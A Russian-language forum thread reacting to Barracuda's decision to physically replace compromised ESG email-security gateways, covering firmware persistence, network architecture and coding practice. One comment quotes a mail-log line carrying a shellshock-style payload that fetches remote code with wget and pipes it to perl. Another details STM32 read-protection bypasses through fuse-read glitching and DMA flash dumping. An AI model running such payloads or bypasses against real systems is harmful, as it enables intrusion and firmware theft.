Компания Barracuda Networks объявила о необходимости физической замены устройств ESG (Email Security Gateway), поражённых вредоносным ПО в результате 0-day уязвимости в модуле обработки вложений к электронной почте. Сообщается, что для блокирования проблемы установки ранее выпущенных патчей недостаточно. Подробности не приводятся, но предположительно решение о замене оборудования принято из-за атаки, приведшей к установке вредоносного ПО на низком уровне, и невозможности его удалить путём замены прошивки или сброса в заводское состояние. Оборудование будет заменено бесплатно, о компенсации расходов на доставку и работу по замене не уточняется...Подробнее: https://www.opennet.dev/opennews/art.shtml?num=59278
Комиссия спалила их бэкдор и теперь требуют убрать
Убрать эту компанию из списка поставщиков, бекдор оказалась слишком аппаратным.
новое железо с обновленным бекдором
На самом деле это достаточно просто устроить, имхо: если апдейт на фирмвару от хаксора откажется потом грузить фирменнные апдейты, а бутлоадер заменит на свой, отказывающийся шить вендорскую фирмвару... это все не так уж сложно сделать как можно себе представить.И тут вендор такой - опа! Его выперли с его же девайса. Жытаг осваивайте, там свое всегда отспорить можно :)
> Жытаг осваивайте, там свое всегда отспорить можно :)Не всегда. Иногда предохранители выжигаются при записи софта для защиты от аппаратной отладки. Тот же народный STM32, например. И уже не перезальёшь ничего. Только чип перепаивать.
На колодку ставить)
1) STM32 F1xx и тому подобные - можно "вернуть себе" как раз всегда. Там лишь 1 уровень защиты от чтения - и он не запрещает дебаг или ROM loader насовсем, лишь ограничивает операции. Такой чип всегда можно вернуть в "девственный" вид, но, правда, только, после полного стирания - так что фирмвару из него вы не получите. Как минимум официально и удобно.
2) Де факто есть атака с использованием этого дебажного доступа, позволяющая большую часть фирмвары все-таки выковырять. Очень креативным обходом STшных защит через I-bus. Но это не полная копия и стопроцентно спиратить-забэкапить все же не получится.
3) F0/L0/L1/etc сделали 2-й уровень защиты, он более мерзкий и отключает жытаг и ROM лоадер. И вот тут чипак уже делает только то что хочет его встроенная фирмвара. И если "юзерский" бутлоадер и фирмвара - и вас к себе пускать не хотят - вот тут уже неудобненько получается, потому что красивого и официального способа нет, replace MCU and press any key.
4) Менее официально, это состояние врубается только если фуз профлешен в вполне конкнетное состояние. И его инверсная копия - тоже. Если поймать момент когда чип читает состояние фузов и сбить вот это вот, вы все правильно поняли: чип вывалится в fallback-режим с защитой уровня 1. После этого станет доступен JTAG и бутлоадер. Далее см. пункт 1.И это работает в обе стороны. Атакующий сменивший "юзерский" бутлоадер в флехе на свой и быренько вырубающий JTAG при старте может сделать довольно неудобно легитимному обладателю системы, если апдейтилось через их кастомный бут а не STшный ROM (довольно дурной и специфичный). Жытагом/swd правда все равно зацепиться можно - если оно RESET# умеет зажимать, так что запрет жытага в коде (например рекрнфигом пинов) обломается.
Физически как вы уже поняли там ничего и никогда не выжигается. Там даже "boot ROM" - отдельная секция в модуле флеша, рядом с секцией фузов. ST шьет его на фабе, видимо, через JTAG или SWD. Потом сегмент, вероятно, лочится в readonly, а процедура программирования этого сегмента вообще не документирована. Можно и свои сегменты в readonly loчить, сделав этакий эквивалент ROM-loader в фирмваре - потом его стереть станет достаточно канительно.
И фузы - лишь байтики в отдельной секции массива флеша. Они как бы стирабельны - и если F0/L0/L1 выбить из level 2 lock заскоками с питанием сбивающими чтение фузов, потом его можно стереть и вернуть в фабричный вид как обычно с level 1 защитой.
Есть и еще несколько забавных исследований - например из F0 при определенных условиях исследователи вообще всю прощивку выдергивать научились.
p.s. а китайские клоны вообще позорники: чаще всего забывают даже "детские" веши заткнуть, типа попросить DMA читануть флеху -> RAM (mem2mem xfer), опа, ололо, можно забрать буфер из RAM (level 1 не блочит работу с SRAM, но вырубает доступ в флеш для всего что не I-bus проца). И так за несколько итераций можно DMA понакидать себе флеху -> SRAM и слить ее дебагером. Копипастеры из китая такие вещи забывают учесть.
Intel Boot Guard должен запрещать загрузку вирусных прошивок BIOS/UEFI, а они уже вирусных BootLoader-ов и далее по цепочке верифицированной загрузки.Это не снимает проблему окерпичивания устройства при заражении.
Не смешно, когда собственные устройства работают против вас. Прогресс, а что поделать? Жизнь полна неожиданностей.
> Не смешно, когда собственные устройства работают против вас.
> Прогресс, а что поделать? Жизнь полна неожиданностей.Вы sci-fi когда-нибудь смотрели? Перехват инженерных систем более-менее крупных (или массовых) кораблей - невероятно злой, эффективный и нахальный вид диверсий, ведущих к жирным факапам у адресата атаки. Как вы уже поняли если в большой системе управляемой компьютерами обосновался кто-то другой, вы основательно залетаете. А еще, как вы догадались, все это реализуемо и уже в общем то начинает иметь определенный смысл. Уже были очень интересные атаки когда хацкеры с информационно-развлекательной системы самолета влезали в куда более интересный сегмент сети. Где вон те компьютеры общаются как раз. Ведь нынче в моде fly by wire. Это как раз доисторический прототип тех звездных крейсеров, первобытная и кривая пока еще версия. Знакомьтесь.
Всегда знал что эти аппаратные комплексы по защите чего угодно полная туфта.
Чего это вдруг? Вот жеж, защитили. Прибор защищенный плавким предохранителем успешно защитил предохранитель, расплавившись первым.Враг не прошел в корпоративную сеть. Правда, пару месяцев теперь сеть без почты, в ожидании rma, но так, наверное, и было задумано?
P.S. дайте угадаю, у ней внутре помимо неонки был lin00ps
Я к тому зачем вообще этой штуке кроме софта, ещё какая-то своя аппаратная конструкция. Такое конечно делают во всяких аппаратных балансировщиках, для большой нагрузки. Но вот даже там понятно что ты это не сможешь обновиться так просто или научить эту штуку новым трюкам.Собственно сабж что-то такое и словил что раз уж он такой аппаратный, оптимизированный и на низком уровне обновить его нельзя и защищает он до первого серьёзного инцидента. Был бы это просто обычный ПК с прогой там всё ясно обновился и всё почта под защитой. Ну ок нагрузка у тебя большая поставь два таких или десять. Это я даже не говорю что эту прогу можно поставить туда где вся остальная почта крутится.
Я думаю, что всё гораздо проще. Перешили биос и поставили флаг защиты от записи в области, где конфиг чипсета хранится. И теперь чипсет не даёт прошить, нужно вынимать чип и в программатор его. Но так как вскрывать корпус категорически запрещено, ибо коммерческая тайна, копирайты и т.д., то будьте добры переслать Корпорации.Кто скупит устройство задешево на Авито у тех, кто начнёт от них избавляться, и научится перешивать сам, тот неплохо подзаработает.
> Я думаю, что всё гораздо проще. Перешили биос и поставили флаг защитыЕще проще - взяли и отрубили перешивалку. Может и ненарочно даже а под rm -f подпала. А поскольку это не компьютер, мониторчик-клавиатурку не подключишь и с флэшечки не загрузишься - то и без конторского сервисмена знающего как подключаться напрямую к плате хрен что перепрошьешь даже если оно и подлежит перепрошивке.
Контора прикинула количество и цену командировок сервисмена и решила что проще все забрать себе на склад и заменить.
> от записи в области, где конфиг чипсета хранится. И теперь чипсет
> не даёт прошить, нужно вынимать чип и в программатор его. Но
> так как вскрывать корпус категорически запрещено, ибо коммерческая тайна, копирайты ипросто ни банк ни завод не будут вскрывать корпус какой-то ит-коробки и что-то там ковырять. А вы как всегда свою конспирологию на пустом месте разводите.
Нет штатного варианта восстановления - значит нет его, везите откуда получали.
> Кто скупит устройство задешево на Авито у тех, кто начнёт от них
> избавляться, и научится перешивать сам, тот неплохо подзаработает.никому не нужны устаревшие стоечные серверы малой мощности. А больше ты на нем ничего не заработаешь.
> А вы как всегда свою конспирологию на пустом месте разводите.Ой, извините, я наверное забыл снять свою конспирологическую шапочку. Буду знать, что нужно быть более скептичным к любым возможным объяснениям и просто принимать все как есть.
> никому не нужны устаревшие стоечные серверы малой мощности.
Вот-вот, кто же захочет купить устаревшие серверы? Особенно если они имеют проблемы с перепрошивкой. Продажа таких устройств на Avito — просто золотая жила для всех, кто хочет заработать деньги. Какой план!
> Я к тому зачем вообще этой штуке кроме софта, ещё какая-то своя аппаратная конструкция.ну типа когда компьютеры были большие - это было неплохим вариантом (тот же цискин аплайанс тоже аппаратный изначально, хотя сейчас есть и виртуальные айронпорты)
Ну и сп-ть китайскому конкуренту сложнее.
> Был бы это просто обычный ПК с прогой там всё ясно обновился
в обычном тоже бывают всякие уефи и bmc, в которых тоже может прописываться малварь и вообще хрен выковыряешь. Виртуализация - да, до некоторой степени защищает, но тоже не в этом случае - тут явно старательно копали, а такие могут накопать и дырку из вм в хост, тем более что их регулярно есть.
А аплайанс заменил и дело с концом, так что и в этом плане вариант не худший. Место в стойке - ну жалко, да.
А там ещё-что то совсем аппаратное есть, типа Asic? И их нельзя будет задействовать из-за уязвимости? А если использовать аккуратно asic, со знанием дела?
Или почему с новой прошивкой это устройство уже не нужно, хотя раньше было нужно?
В барракудах? Нет там ничего. Обычный x86 с перелицованным корпусом.
> Враг не прошел в корпоративную сеть.почему ? как раз прошел и (будем готовиться к худшему) закрепился там внутри.
железка была использована как плацдарм, можете ее менять, можете не менять -
все равно нужен аудит и зачистка всего вплоть до сетевых принтеров и
контроллеров СКУД-видео-противопожарки.
Хорошая фантазия. На практике же, у этой железки нет доступа в корпоративную сеть. Это почтовый гейт, от которого до ближайшего Exchange минимум один фаерволл и один роутер, а по соседству в том же влане в лучшем случае второй такой же гейт. Да и то не факт, что им друг с другом разрешено общаться. Кроме того, исследования не нашли следов и возможностей для дальнейших эскалаций.
> до ближайшего Exchangeвы сами все и сказали. никто за язык не тянул.
> минимум один
> фаерволл и один роутер,фаерволлы, роутеры и вланы не помогают против атак на приложения.
волшебные пакеты, волшебные письма и т.п. проходят через них.
И что изменилось с появлением взломанной Барракуды? Волшебные письма и пакеты получили +30 к волшебству? Эксчендж стал каким-то более уязвимым от того, что ровно те же письма по ровно тому же SMTP получает не напрямую с твоего открытого релея, а от гейта?
С большой вероятностью с той барракуды был открыт доступ к ексченджу и лдап АД.. хорошо если только по минимуму, к нужным портам, а не просто к IP (или, если "повезло", вообще он стоял внутри периметра)...
Тоже хорошая фантазия, и тоже ближе к фольклору, чем к реальности. Компании, которые пользуются подобными устройствами, так же используют референсную архитектуру, предоставляемую вендором. А в тех случаях, когда это невозможно, платят вендору или интегратору за кастомизацию. В противном случае вендор просто откажется от всех гарантий. И правильно сделает, в общем-то. Открытый доступ во внутреннюю сеть с почтового гейта бывает в сомнительных полуподвальных конторках, предпочитающих б/у с ебея, и эникеев с района. Но такие и не покупают вендорские решения для фильтрации почты, как раз наоборот, от них почту фильтровать приходится.
> С большой вероятностью с той барракуды был открыт доступ к ексченджуну так ее для этого ломать не надо было - просто послать письмо.
А никаких других доступов в таких случаях открывать не принято (у тех у кого принято - нет деньгов на баракудину подписку).ldap ad - ну можно поподбирать учетки для фишинга, но опять же ты ж их и так мог подбирать, можно даже не рассылая самих писем, просто с RCPT TO экспериментируя.
Вот если в dmz помойка (а вот так - бывает и у крупняка - фсе тащить в dmz, и подальше, подальше)- - то можно поискать каких-нибудь соседей по планете, с какими-нибудь глупостями в настройках (вот такое - тоже весьма часто).
То есть не то чтоб прям совсем ужасно, но хорошего мало.Ну, может поумнеют и нормальный файрвол купят. Или имеющийся настроят. Пока я такое настраивал - типовой сеткой за файрволом была /29 - мне не жалко, у него вланов четыре тыщи и еще останется на интерконнекты вполне достаточно.
> Ну, может поумнеют и нормальный файрвол купят. Или имеющийся настроят.Вроде не совсем ду** волшебный на голову но всё же - сморозил :) Выкинут на ЮХ и переёдут на O365, чтоб забыть этот гимморой напрочь :) Если чо - я работал в компании которая и продала Barracuda и IronPort собственно антиспам. Дык вот все те Ынженегры - перековались, не нужно это никому.
>> Ну, может поумнеют и нормальный файрвол купят. Или имеющийся настроят.
> Вроде не совсем ду** волшебный на голову но всё же - сморозил
> :) Выкинут на ЮХ и переёдут на O365, чтоб забыть этота им дадут? Нам, например, afaik, нельзя.
А кто мог перейти на 365 уже давно всех админов поувольнял и коробки сдал в металлолом, зачем оно, и так же ж всеработает.
> гимморой напрочь :) Если чо - я работал в компании которая
> и продала Barracuda и IronPort собственно антиспам. Дык вот все те
> Ынженегры - перековались, не нужно это никому.это ты еще цискиных не видел :-(
Я тут давно-давно кидал ссылку на промо nginx+ - лет десять уже если не больше прошло.
Все что вы хотели знать но на самом деле совсем не хотели про состояние (уже не) современного IT.Поскольку вряд ли то видео выжило, краткий пересказ: чувак представляется - "я тут новенький, а был я вообще-то разработчиком в cisco. А теперь я proud to be пресейл-менеджером в nginx+!" ЧТОА?!
Дальше, собственно, и смотреть то видео было незачем, только идти бухать с горя.
> "я тут новенький, а был я вообще-то разработчиком в cisco. А теперь я proud to be пресейл-менеджером в nginx+!" ЧТОА?!Пресейлсы из разрабов хорошие получаются. Ну, при условии, что разраб не аутист и может с любыми людьми общаться, а не только с другими разрабами. Работа пресейлса — перевести с человеческого языка на программистский и понять, может ли вообще продукт делать то, что бизнесу надо, а если не может — как быстро и какой кровью можно допилить чтобы мог. И можно ли вообще.
> Дальше, собственно, и смотреть то видео было незачем, только идти бухать с горя.
С горя ли, от радости — всё равно бухать. Ну и в чём разница тогда?
>"я тут новенький, а был я вообще-то разработчиком в cisco. А теперь я proud to be пресейл-менеджером в nginx+!" ЧТОА?!Лично знаю кучу народа, которые подались в продакт-менеджеры, сейлы, тимлиды (некодящие) из разрабов, и все исключительно по причине того, что кодить до смерти надоело, а тут другая и очень даже веселая жизнь. Только часть разрабов любители своего дела, большинство затесались на время. Они же и раздули в инторнетах миф, что разраб после 30-35-ти-это неудачник, раз не выбился в тимлиды-менеджеры etc, а продолжает прозябать (по их мнению) за кодингом.
> Лично знаю кучу народа, которые подались в продакт-менеджеры, сейлы,Продакт (project) манагеры это обычно как раз очень крутые кодеры. А то что львиную долю работ теперь другие ворочают под их чутким руководством - ну, знаете, а еще главе фирмы не обязательно лично разгружать каждый грузовик.
> тимлиды (некодящие)
И как оно, извините, лидирует и кому? Команде техписов чтоли? :)
> из разрабов, и все исключительно по причине того, что кодить до смерти надоело,
Значит это изначально не их было и они приперлись туда только из-за денег. Но вообще-то PM/архитект а для особо удачливых и CTO - это логичная эволюция кодера. В какой-то момент можно понять что скилл достаточно крут чтобы попытаться на этот уровень втянуть команду в целом, задавая им тон, показывая как надо было. При необходимости умея это вот именно лично показать.
> ти-это неудачник, раз не выбился в тимлиды-менеджеры etc, а продолжает
> прозябать (по их мнению) за кодингом.Как ни странно обе точки зрения имеют свой пойнт а истина как обычно сложнее чем некоторые пытаются вещать.
Угу. Пришлось срочно перевыписывать все внешние сертификаты... тот ещё геморрой с учётом процедур.
Бл**! Вот влилпли а? Барракуда, случайно, эта не та компания которая выпускает(ла) жёсткие диски?
Видимо, атака спецслужб. Кто ещё ради этого в прошивку полезет? Чё, бинго сорвали, многие покупатели устройства менять не станут/смогут, а выкинуть устройства в мусор они себе позволить не могут, так и будут юзать вредоносное устройство. Особенно, если они находятся в подсанкционном государстве, или против них введены санкции.
так американские спецслужбы сделали что хотели, но сторонние хацкеры, пробравшись в их притон, спалили контору и теперь требуется срочно закрыть "внезапно обнаруженную" дыру
>нескольких видов вредоносного ПО - SALTWATER, SEASPY и SEASIDEЧто, прямо в имплантах их названия записаны? Или специально придуманы, чтобы сделать вид, что это продукция одной организации, любящей давать своим вредоносам и программам слежки названия из одних прописных?
> Что, прямо в имплантах их названия записаны?Не знаю, что такое имплант, но в теле зловреда нередко оставляют текстовые строки.
Да, специально, чтобы была для антивируса сигнатура, в авторстве сомнений не было, и чтобы реверсить было проще! Строки если нужны - то их наоборот хешируют.
Что тут обычно, так это качество анонимной экспертизы. По факту Rustock.C был так назван, поскольку содержал в себе путь к имени файла с исходниками.
Не смогут позволить что именно? Коробку скотчем замотать и лейбу на принтере распечатать? Замена за счёт вендора.
> Не смогут позволить что именно? Коробку скотчем замотать и лейбу на принтере
> распечатать? Замена за счёт вендора.о времена, о нравы - еще небось на СВОЕМ принтере?!
Эх... А когда-то малчык прибегал с коробкой в ручонках и торжественно ее нам вручал в обмен на сдохшую... давно енто было, конечно.
Мальчик с тех пор подрос, и работает в UPS. Но таки да, печатать приходится на своём принтере.
Почему не станут-то? Нам вообще заменили мегаоперативно - мы обратились в первый день оповещений, через два дня получили пачку железок.
> Видимо, атака спецслужб. Кто ещё ради этого в прошивку полезет?Ради чего «этого»? Ради сбора всей корреспонденции бизнеса? Ну даже не знаю, кому это может быть интересно, кроме таинственных спецслужб. Наверное… Всем кто обретается в этом бизнесе? От биржевых спекулянтов до конкурентов и контрагетов? Да нет, бред какой-то. Конечно же это спецслужбы, следят с целью слежки. От внутренней непримиримой злобы.
> Видимо, атака спецслужб. Кто ещё ради этого в прошивку полезет?Ну вон автор MIRAI не был спецслужбами. Зато собрал ботнет в 300К ботов в момент, завалил несколько CDNов так что его друго-врага Креббса хостер выпер, хоть и "защита от DDoS". Креббс впрочем в долгу не остался и помог поймать этого вредителя. Инфррмационная безопасность - это как-то так.
А при чем тут прошивки? MIRAI - ультра кроссплатформенная пакость, интересующаяся в основном IoT устройствами. Поддерживает дюжины этак полторы процессорных архитектур - а начальный качальщик может дать мастеркласс по кроссплатформенному программированию когда о системе не известно ничего, кроме того что там линух. Ему даже версия и тип libc пофиг, он сисколами линуха минимальный subset нужного собирает себе. Правда и x86 он тоже не брезгует, ежели прокатило, для него у него тоже билд есть - что 32 что 64 бита. Так что на гитхабе ЭТО лежит (или как минимум лежало), но вот запускать на своем компе собраный бинарь все же не рекомендуется.
> ESG представляет собой аппаратно-программный комплекс для защиты электронной почты предприятий от атак, спама и вирусов.Причиной пожара стало возгорание противопожарной системы.
> при выполнении кода через Perl-оператор "qx"Классика жанра. Уж сколько раз твердили миру, что дёргать утилиты в дочернем шелле - ещё больший моветон, чем использовать goto.
Ты не шаришь в goto?
Пытаешься троллить или просто проецируешь?
goto ничем не плох, проме того что в кривых руках он ломает читабельность.
В правильных он наоборот читабельность повышает и упрощает логику.
Классика жанра:
* Код мой -> упрощение логики и повышенная читабельность
* Код чужой -> кривые руки и поломанная читабельность
Вовсе нет.
Я долго избегал goto у себя в коде, пока не увидел его в исходниках ядра FreeBSD, и там оно реально сильно упрощало логику и повышало читабельность.Сам часто использую для того чтобы вывалится в тот кусок функции который обрабатывает ошибку и освобождает ресурсы перед возвратом кода ошибки.
Очень редко для retry.
> использую для того чтобы вывалится в тот кусок функции который обрабатывает ошибку и освобождает ресурсыНу вот это как раз потому, что у вас в коде типичная сишная императивная лапша, где в одной функции вместе с логикой намешаны и аллокация, и освобождение, и обработка ошибок.
И что с того?
> дёргать утилиты в дочернем шелле - ещё больший моветон, чем использовать gotoНу как бы нет. Это за использование qx для запуска шела на бить по рукам. Это означает, что разраб вообще не понимал, что делает. Если там такой уровень разработки - все эти железки нужно срочно отключать и убирать на полку.
В программировании не бывает жёстких законов - только указания.GOTO удобен для описания конечных автоматов.
Синглтоны - это норма: большинство классов нужно только в одном экземпляре. Делать синглтоны через грязный хак в конструкторе - обычно боком выходит, через DI - хорошо.
В глобальной переменной удобно хранить логгер.
Протектед методы нужно покрывать юнит-тестами если пишешь фреймворк.
Внешние ключи не используются в больших БД с шардингом.
Если это облегчает восприятние кода, то можно его хоть в два столбика писать, называть переменные a1, a2, a3, и мешать snake_case с CamelCase и lowerCamelCase.
И таких примеров - миллионы. Всегда нужно думать своей головой.
> GOTO удобен для описания конечных автоматов.Проблема в том что он удобен еще и для прострела пяток не сильно очевидными способами, когда вы просто потеряли flow и сделали что-то не то, даже и не заметив это. Иногда и при вон том самом - отслеживать и тем более автоматически анализировать корректность этих действ и намерений кодера при этом малореально. Данная конструкция крайне опасна в аспекте провоцирования багов и сильно усложняет анализ (и въезд других кодеров в код). Именно поэтому ее и не рекомендуют.
> Синглтоны - это норма: большинство классов нужно только в одном экземпляре.
Я все понимаю, но зачем тогда вообще заводить классы? :)
> В глобальной переменной удобно хранить логгер.
А также какие-то ну вот реально глобальные вещи. Типа, скажем, общей конфигурации программы, которая доступается буквально отовсюду. Просто этого должен быть необходимый минимум и ни битом более. Потому что скрытые параметры вне формальных деклараций что вон та штука использует в общем случае не рулят, а попытка поменять что-то вон в этом глобальном там может оказаться довольно мучительна когда половина кода внезапно развалится.
> называть переменные a1, a2, a3,
В этом месте вас проклянет следующий майнтайнер этого кода...
> и мешать snake_case с CamelCase и lowerCamelCase.
А в этом месте вас линчуют коллеги/коммитеры/майнтайнеры и все кто будет иметь дело с этим кодом. Потому что вы сломали их ожидания - и обрекли на множество дурных багов на ровном месте. Такой код может быть проще списать в утиль и переписать заново, он может оказаться непригоден к майнтенансу.
> И таких примеров - миллионы. Всегда нужно думать своей головой.
Особенно в упомянутых случаях. Потому что их маркировали как проблемные по вполне конкретным причинам.
>Оборудование будет заменено бесплатно
Как "нейгочип" в DEHR?
> Бэкдор SALTWATER был оформлен в виде модуля mod_udp.so
> к SMTP-процессу bsmtpdLD_PRELOAD?
Зато место на диске сэкономили!
Email InSecurity gateway однако получился. Ну, что, кто еще из безопасников хочет нанять дешевых раджей разбирающихся в иб как свиньи в апельсинах? :)
Что теперь эту компанию оштрафуют на жесткие 60 000 рублей? Да пофиг можно не то что нанять дешевых, а вообще всех разогнать ничего не изменится.
В очередной раз "кровавый энтерпрайз" показал что никакой он не кровавый а от другой всем извесной субстанции
Какой же это энтерпрайз? это молодая динамично развивающаяся компания, а 5 прошивку, с которой все началось, делали вообще тиктокеры на удаленке.
> Какой же это энтерпрайз? это молодая динамично развивающаяся компания, а 5 прошивку,
> с которой все началось, делали вообще тиктокеры на удаленке.У них в подвале:
> © 2003 - 2023 Barracuda Networks, Inc.Уже весьма немолодая. Хардварный шлюз для электронной почты это не может быть не энтерпрайз. Нормальному человеку такое даже в голову не прийдёт.
>> Какой же это энтерпрайз? это молодая динамично развивающаяся компания, а 5 прошивку,
>> с которой все началось, делали вообще тиктокеры на удаленке.
> У них в подвале:
>> © 2003 - 2023 Barracuda Networks, Inc.
> Уже весьма немолодая. Хардварный шлюз для электронной почты это не может быть
> не энтерпрайз. Нормальному человеку такое даже в голову не прийдёт.Не фирма-однодевка, но молодая.
5 версия вышла в 2017. 9 в 2023. грубо говоря, до 2011 этот стартап искал инвесторов и не функционировал.
тарифные планы у них начинаются с 100 ящиков, это SMB сегмент.кровавый энтерпрайз начинается от 50 лет и сумм на 2 порядка выше.
Ну щассс... сколько там лет ironport до покупки его циской?Изобрели идею, успешно провернули, набрали на ipo, собрали бабла, продали подорого... Правда, в отличие от этих, они не кламав (или что там?) использовали, конечно.
Унутре, кстати, фря. (Ну и неонка, етосамое.)
И ничего, лавки из top50 юзают... куда им деваться-то с подводной лодки.
> Ну щассс... сколько там лет ironport до покупки его циской?это им очень совпало с периодом когда у эффективных менеджеров возникла мода скупать стартапы а не пилить свои велосипеды с нуля.
> И ничего, лавки из top50 юзают... куда им деваться-то с подводной лодки.
маркетинг циски может зимой продать чукчам снег. а уж незаметно впарить клиентам пакетом "на сдачу" от годовой подписки при очередном обновлении линейки еще один продукт.
> Ну щассс... сколько там лет ironport до покупки его циской?
> Изобрели идею, успешно провернули, набрали на ipo, собрали бабла, продали подорого... Правда,
> в отличие от этих, они не кламав (или что там?) использовали,
> конечно.а зачем циска поглощала ClamAV и Snort
да хз - может избавлялась от неконтролируемых конкурентов, может назло врагам, а может деваться некуда - я уж и не помню, что там штатно в ironport, по-моему чуть ли не sophos был (то есть не свое и платить ему за каждое обновление)Это про кламдрянь, разумеется. К snort вопросов нету, он был уж как минимум не хуже штатной цискиной ids коробки (тоже, разумеется, redhat внутри, но тогда там какой-то унылый собственный трэш крутился) - если ему правила кто-то будет писать. А прикованных индусов у цисок как раз - horde.
Но главная идея ironport не антивирус ни разу, а relay reputation network, ну и типовой набор для юзверей (правда феерически неудобный и все к нему писали свои междумордия) чтоб почту не в /dev/null отправлял и ее в конечном итоге можно было как-то извлечь.
У этих, видимо, примерно такое же.
> Но главная идея ironport не антивирус ни разу, а relay reputation network
> У этих, видимо, примерно такое же.Повторяю большими красными буквами, что Barrakuda что IronPort - личензировали антиспам у одной гордой но маленькой компании :) С репутачиями и 12 стэйжами навески скора. Iron-ы SCORE (hardened FreeBSD 4.11) тоже купили. Что оставили - не в курсе.
Впрочем этот бизнесс кончилося в 2009: их купили китайцы прикидывающиеся американцами (watchguard). Предлагали перевезти в Сиэтл, зряплату правда ни сказать чтоб приличную предложили - но я вежливо отказался. Они все на пистоне(!!!!!) переписывать начали, я решил уж лучше в телекомы подамся. Ну и подался :)
14 years ago, on one far, far, far galaxy ... (C)
:)
> - но я вежливо отказался. Они все на пистоне(!!!!!) переписывать
> начали, я решил уж лучше в телекомы подамся. Ну и подалсявот, была бы непыльная работенка на всю жизнь, переписывать с пистона на пистон по мере планового устаревания пистонов.
А у тех кто не переписывал 20 лет - вишь, внутри qx случайно забрался какой-то чужой, неправильный кот и в тапки нагадил.
Интересно, у ironport тоже такой же?
> вот, была бы непыльная работенка на всю жизнь, переписывать с пистона на
> пистон по мере планового устаревания пистонов.Работяги в твиттере тоже так думали. Пришел Маск и вышиб 80% этих самых, обнаружив что оказывается и так все неплохо работает.
У остальных с этого шоу конкретно подгорело, менеджеры удивленно пробурчали "а что, так можно было?!" - и уволили еще 200К таких счастливчиков из разных фирм. И еще небось столько же уволят, по мере раздупления.
Не удивлюсь, если там внутри какой-нибудь amavis (который как раз на перле)
>Проблема была вызвана отсутствием должной проверки имён файлов внутри tar-архивов, передаваемых в почтовом вложении, и позволяла выполнить произвольную команду в системе с повышенными привилегиями, обойдя экранирование при выполнении кода через Perl-оператор "qx".Вероятнее всего связка ClamAV + SpamAssassin
Спамооборона
Jun 11 12:54:23 mg16 postfix/smtpd[10418]: warning: Illegal address syntax from serv1.jokeroo.com[104.200.159.174] in MAIL command: <() { :; }; wget -qO - 68.235.39.225/ipax|perl>нашел в логах эксплоит :)
Коментарии на испанском
А что это вообще за дуршлаг?
Например 68.235.39.225/e/ работает и вываливает какой-то забавный хлам.
Вот что бывает когда АНБ США набирает себе сотрудников для баланса гендерной нейтральности. Страдает профессионализм структуры. А былые времена уязвимость замаскировали бы так что лет 20 не нашли.
То, что они не могут пофиксить прошивку без замены устройства - это прям мегафакап для всей их архитектуры. CTO с командой можно гнать ссаными тряпками без выходного пособия. Так-то баги у всех бывают, но если ты не можешь пофиксить это без гемора для клиента - не надо тебе заниматься этим делом, выбери другую профессию.
CTO - это профессия грести деньги, а не менять прошивки. Вот ты его прогнал в другую отрасль, он пойдёт и тоже там зафакапит, увеличив личный счёт на пару лямов. В третий раз придёт воспитывать твоих детей, он же умеет.
Ды почему факап. Есть base OS, есть набор пакетов собственно аппликухи - "фирмварь". Base OS удалённо если и обновляется, то очень ограниченно. Дальше - как ты будешь чинить порутованную операционку удалённо? Она тебе этого может просто не дать сделать. Трахаться с IPMI и заливкой здоровенного образа через VCD/VUSB - это очень долго, проще выслать новую железку. Ну и да, где гарантии, что руткит собственно в фирмварь платы не залез, с утечками всяких интелоключей тоже не исключено. Лучше таки заменить целиком.
// IPMI для тяжёлых случаев у них есть, кстате, но, видимо, решили геморроев на ровном месте не разводить
> // IPMI для тяжёлых случаев у них есть, кстате, но, видимо, решили
> геморроев на ровном месте не разводитьу них может и установочного образа-то не быть, нафига он нужен, чтоб потырили и своих хакокуд наплодили? Разливают поди все дискдупликатором каким еще до монтажа в коробку.
А если и есть образ, то под десятью замками. А то каждый так сможет.
Деплойный образ-то скорее всего есть, особенно с учётом того, что у них даже виртуалки мать-мать чем-то внутри отличаются, download для каждого клиента свой.
> Дальше - как ты будешь чинить порутованную операционку удалённо? Она тебе этого
> может просто не дать сделать.Ну мил человек, чай не в 20-м веке-то живем. Полно технологий и подходов уже известно, тот же Dual BIOS. А вообще в Баракуде прям просится Hardened Linux, со всеми плюшками - политиками доступа, изоляцией процессов, файловых систем, уровнями доступа и прочие сладостные для уха безопасника слова.
> Ну мил человек, чай не в 20-м веке-то живем. Полно технологий и
> подходов уже известно, тот же Dual BIOS. А вообще в Баракуденет гарантии что он не dual pwned, нужно об этом думать на этапе проектирования, выбирать плату с поддержкой и потом бороться с производителем решившим именно ее снять потому что перестали выпускать вооон тот мелкий преобразователь напряжений который так здорово лег в схему.
Зачем закладываться на такие жуткие факапы как этот? Слуцилась? Ну поменяли коробки, и клиенту так спокойней (все равно они наверняка на саппорт контракте с заменой 5/7/24). Заодно убедиться что ничего не забыли и помимо трех троянцев нет четвертого еще через какую-то интересную технологическую отверстию.
> Ну поменяли коробкиА-ха-ха, "поменяли коробки". Поменять коробки можно для кошки. А замена инфраструктурных элементов крупной компании - это отдельный геморой для всего IT-отдела. И вряд ли эту Баракуду будут еще закупать. Никому геморой не нравится, знаете ли..
В чём проблема замены-то? Одну железку почистить и снять, одну поставить и включить в кластер.
Делов ровно на час. Если железок несколько и кластер большой - можно за этот же час десяток-другой убрать-добавить, всё упирается только в скорость прокликивания :D
> В чём проблема замены-то? Одну железку почистить и снять, одну поставить и
> включить в кластер.Что значит - "одну"? У вас все железки скомпроментированы. Их надо разом все выключать и заново конфигурить.
Чо? Новые железки уязвимости не имеют.
Да, есть некоторое опасение, что через кластеринг может тоже просочиться - но это в целом малореально, учитывая что кластеринг только синхронизацию элементов конфига из себя представляет.
> Чо? Новые железки уязвимости не имеют.
> Да, есть некоторое опасение, что через кластеринг может тоже просочиться - но
> это в целом малореально, учитывая что кластеринг только синхронизацию элементов конфига
> из себя представляет.Я так понимаю, что основы безопасности сетей и серверов Вам не очень хорошо знакомы?
Если хоть одна железка скомпроментирована - это уже повод проводить полный аудит по безопасности всех серверов и железок, что были в той сети. И никто не будет дожидаться, пока приедет новая баракуда, скомпроментированные будут просто отключать как можно быстрее. И опять же, нет гарантии, что чудики все починили и других подобные багов там не осталось.
Да. Обязательно выключить всё и полгода разбираться. Клиенты подождут, главное - аудит.
Реальность от мира розовых поней отличается очень сильно. Сначала меняем-затыкаем, потом разбираемся с хвостами.
И да, расскажи нам, благородный дон, что ты собрался аудитить в закрытой железке?
Я злой сегодня.В "той сети" - это в какой? У меня допустим оно в паблике стоит. Будешь всю 0.0.0.0/0 и ::/0 аудитить? Успехов.
